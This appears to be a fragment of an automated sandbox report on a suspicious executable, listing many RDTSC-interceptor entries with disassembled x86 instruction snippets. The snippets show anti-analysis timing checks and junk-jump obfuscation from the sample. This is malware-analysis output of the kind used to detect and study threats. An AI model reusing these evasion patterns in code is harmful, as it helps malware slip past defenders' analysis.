                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D3006C second address: 4D3010E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c jmp 00007FD3A47FEE8Eh 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 mov esi, 18A2334Dh 0x00000018 pushfd 0x00000019 jmp 00007FD3A47FEE8Ah 0x0000001e sub al, 00000068h 0x00000021 jmp 00007FD3A47FEE8Bh 0x00000026 popfd 0x00000027 popad 0x00000028 push eax 0x00000029 jmp 00007FD3A47FEE99h 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 mov cx, 82E3h 0x00000034 pushfd 0x00000035 jmp 00007FD3A47FEE98h 0x0000003a sbb si, F728h 0x0000003f jmp 00007FD3A47FEE8Bh 0x00000044 popfd 0x00000045 popad 0x00000046 xchg eax, esi 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D3010E second address: 4D30112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30112 second address: 4D3012D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D3012D second address: 4D3018B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD3A4D6CBA7h 0x00000011 xor eax, 735A0B2Eh 0x00000017 jmp 00007FD3A4D6CBA9h 0x0000001c popfd 0x0000001d push eax 0x0000001e push edx 0x0000001f mov eax, 220A388Dh 0x00000024 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D3018B second address: 4D3021F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 jmp 00007FD3A47FEE94h 0x0000000d mov esi, dword ptr [ebp+08h] 0x00000010 pushad 0x00000011 mov ebx, ecx 0x00000013 pushfd 0x00000014 jmp 00007FD3A47FEE8Ah 0x00000019 jmp 00007FD3A47FEE95h 0x0000001e popfd 0x0000001f popad 0x00000020 sub ebx, ebx 0x00000022 jmp 00007FD3A47FEE97h 0x00000027 test esi, esi 0x00000029 jmp 00007FD3A47FEE96h 0x0000002e je 00007FD4171C5014h 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FD3A47FEE97h 0x0000003b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D3021F second address: 4D3027D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 11AE3D1Ah 0x00000008 call 00007FD3A4D6CB9Bh 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FD3A4D6CBA0h 0x00000021 xor esi, 27147C88h 0x00000027 jmp 00007FD3A4D6CB9Bh 0x0000002c popfd 0x0000002d call 00007FD3A4D6CBA8h 0x00000032 pop esi 0x00000033 popad 0x00000034 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D3027D second address: 4D302AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b jmp 00007FD3A47FEE90h 0x00000010 je 00007FD4171C4F86h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D302AF second address: 4D302B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D302B5 second address: 4D302C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3A47FEE8Bh 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D302C4 second address: 4D302C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D302C8 second address: 4D302FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [77786968h], 00000002h 0x0000000f jmp 00007FD3A47FEE95h 0x00000014 jne 00007FD4171C4F50h 0x0000001a pushad 0x0000001b mov esi, 16D21D33h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D302FC second address: 4D30300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30300 second address: 4D30345 instructions: 0x00000000 rdtsc 0x00000002 mov cx, FFABh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FD3A47FEE93h 0x00000015 xor cx, CE4Eh 0x0000001a jmp 00007FD3A47FEE99h 0x0000001f popfd 0x00000020 mov edi, esi 0x00000022 popad 0x00000023 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30345 second address: 4D303EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD3A4D6CBA3h 0x00000009 and si, 3C5Eh 0x0000000e jmp 00007FD3A4D6CBA9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FD3A4D6CBA0h 0x0000001a jmp 00007FD3A4D6CBA5h 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 xchg eax, ebx 0x00000024 jmp 00007FD3A4D6CB9Eh 0x00000029 push eax 0x0000002a pushad 0x0000002b mov di, 3A64h 0x0000002f popad 0x00000030 xchg eax, ebx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007FD3A4D6CBA5h 0x00000038 and eax, 16E1FD56h 0x0000003e jmp 00007FD3A4D6CBA1h 0x00000043 popfd 0x00000044 push eax 0x00000045 push edx 0x00000046 mov ebx, esi 0x00000048 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D303EF second address: 4D30429 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD3A47FEE8Ah 0x00000008 sub esi, 4F104F78h 0x0000000e jmp 00007FD3A47FEE8Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD3A47FEE95h 0x0000001f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30429 second address: 4D3042F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D3042F second address: 4D304A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ecx, edx 0x0000000c popad 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FD3A47FEE93h 0x00000015 adc ecx, 5510F94Eh 0x0000001b jmp 00007FD3A47FEE99h 0x00000020 popfd 0x00000021 mov eax, 667CB957h 0x00000026 popad 0x00000027 push dword ptr [ebp+14h] 0x0000002a jmp 00007FD3A47FEE8Ah 0x0000002f push dword ptr [ebp+10h] 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FD3A47FEE97h 0x00000039 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D304A1 second address: 4D304B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3A4D6CBA4h 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D20153 second address: 4D20159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D20159 second address: 4D2015D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D2015D second address: 4D20189 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD3A47FEE94h 0x00000013 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D20189 second address: 4D201D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CB9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx eax, dx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007FD3A4D6CBA7h 0x00000016 adc ecx, 72D2D8DEh 0x0000001c jmp 00007FD3A4D6CBA9h 0x00000021 popfd 0x00000022 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D201D7 second address: 4D201F9 instructions: 0x00000000 rdtsc 0x00000002 mov bl, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD3A47FEE95h 0x00000012 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D201F9 second address: 4D201FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D10D26 second address: 4D10D4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD3A47FEE8Dh 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D90B33 second address: 4D90B43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3A4D6CB9Ch 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D90B43 second address: 4D90BA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FD3A47FEE96h 0x00000011 push eax 0x00000012 jmp 00007FD3A47FEE8Bh 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ch, bl 0x0000001d pushfd 0x0000001e jmp 00007FD3A47FEE8Ch 0x00000023 jmp 00007FD3A47FEE95h 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D90BA1 second address: 4D90BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D80D50 second address: 4D80D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D80D54 second address: 4D80D68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D207F4 second address: 4D2085B instructions: 0x00000000 rdtsc 0x00000002 mov dl, ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FD3A47FEE8Eh 0x0000000d push eax 0x0000000e jmp 00007FD3A47FEE8Bh 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 mov cx, 36BBh 0x00000019 jmp 00007FD3A47FEE90h 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FD3A47FEE8Dh 0x0000002a or ecx, 6B106F76h 0x00000030 jmp 00007FD3A47FEE91h 0x00000035 popfd 0x00000036 mov edx, esi 0x00000038 popad 0x00000039 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D90225 second address: 4D90234 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CB9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D90234 second address: 4D90298 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD3A47FEE8Fh 0x00000009 or esi, 59374EAEh 0x0000000f jmp 00007FD3A47FEE99h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FD3A47FEE90h 0x0000001b add al, 00000028h 0x0000001e jmp 00007FD3A47FEE8Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov bx, 2D96h 0x00000030 mov bx, 8D22h 0x00000034 popad 0x00000035 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D90298 second address: 4D902D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD3A4D6CBA7h 0x00000013 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D902D0 second address: 4D902F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ecx, ebx 0x00000011 popad 0x00000012 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D902F6 second address: 4D90310 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CB9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 11CB2D8Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D90310 second address: 4D90314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D90314 second address: 4D90324 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CB9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D9035C second address: 4D90360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D90360 second address: 4D90366 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D90366 second address: 4D90375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3A47FEE8Bh 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D90375 second address: 4D90379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D603EA second address: 4D603F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D603F0 second address: 4D60471 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007FD3A4D6CBA9h 0x0000000f pushfd 0x00000010 jmp 00007FD3A4D6CBA0h 0x00000015 adc eax, 746CABA8h 0x0000001b jmp 00007FD3A4D6CB9Bh 0x00000020 popfd 0x00000021 pop eax 0x00000022 mov ebx, 05211FECh 0x00000027 popad 0x00000028 xchg eax, ebp 0x00000029 pushad 0x0000002a mov ecx, ebx 0x0000002c mov di, 20F0h 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 jmp 00007FD3A4D6CB9Fh 0x00000038 and esp, FFFFFFF0h 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FD3A4D6CBA5h 0x00000042 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D60471 second address: 4D6049E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a sub esp, 44h 0x0000000d jmp 00007FD3A47FEE8Fh 0x00000012 xchg eax, ebx 0x00000013 pushad 0x00000014 mov edx, ecx 0x00000016 mov ecx, 776A4F47h 0x0000001b popad 0x0000001c push eax 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 movsx edx, cx 0x00000023 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D6049E second address: 4D604D2 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD3A4D6CBA2h 0x00000008 and cx, 9528h 0x0000000d jmp 00007FD3A4D6CB9Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov cx, 6A1Fh 0x00000019 popad 0x0000001a xchg eax, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D604D2 second address: 4D604D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D604D6 second address: 4D604ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D604ED second address: 4D6058F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD3A47FEE8Fh 0x00000009 and esi, 113C9BCEh 0x0000000f jmp 00007FD3A47FEE99h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FD3A47FEE90h 0x0000001b adc esi, 4A043C48h 0x00000021 jmp 00007FD3A47FEE8Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a xchg eax, esi 0x0000002b jmp 00007FD3A47FEE96h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 push ecx 0x00000035 pop ebx 0x00000036 pushfd 0x00000037 jmp 00007FD3A47FEE98h 0x0000003c xor eax, 4FF37108h 0x00000042 jmp 00007FD3A47FEE8Bh 0x00000047 popfd 0x00000048 popad 0x00000049 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D6058F second address: 4D605C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 mov edx, 6388E976h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e pushad 0x0000000f mov ebx, 59FFB14Eh 0x00000014 movsx edi, si 0x00000017 popad 0x00000018 xchg eax, edi 0x00000019 jmp 00007FD3A4D6CB9Eh 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FD3A4D6CB9Eh 0x00000026 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D605C7 second address: 4D605CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D605CD second address: 4D605D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D605D1 second address: 4D605F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD3A47FEE94h 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D605F0 second address: 4D60615 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CB9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007FD3A4D6CB9Bh 0x00000014 pop eax 0x00000015 mov cx, dx 0x00000018 popad 0x00000019 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D60615 second address: 4D60651 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD3A47FEE90h 0x00000009 adc esi, 752D35B8h 0x0000000f jmp 00007FD3A47FEE8Bh 0x00000014 popfd 0x00000015 mov ecx, 40BC99EFh 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [esp+24h], 00000000h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D60651 second address: 4D60668 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D60668 second address: 4D606DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD3A47FEE8Fh 0x00000009 add esi, 153C94DEh 0x0000000f jmp 00007FD3A47FEE99h 0x00000014 popfd 0x00000015 mov eax, 2E9B43A7h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d lock bts dword ptr [edi], 00000000h 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FD3A47FEE8Fh 0x0000002b sbb cx, 4EEEh 0x00000030 jmp 00007FD3A47FEE99h 0x00000035 popfd 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D606DC second address: 4D606E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D606E1 second address: 4D60708 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FD417140BBDh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D60708 second address: 4D6070E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D6070E second address: 4D60773 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD3A47FEE8Eh 0x00000011 or ecx, 79DFE3F8h 0x00000017 jmp 00007FD3A47FEE8Bh 0x0000001c popfd 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FD3A47FEE96h 0x00000024 adc cx, BE58h 0x00000029 jmp 00007FD3A47FEE8Bh 0x0000002e popfd 0x0000002f push eax 0x00000030 pop ebx 0x00000031 popad 0x00000032 popad 0x00000033 pop esi 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 mov di, si 0x0000003a rdtsc
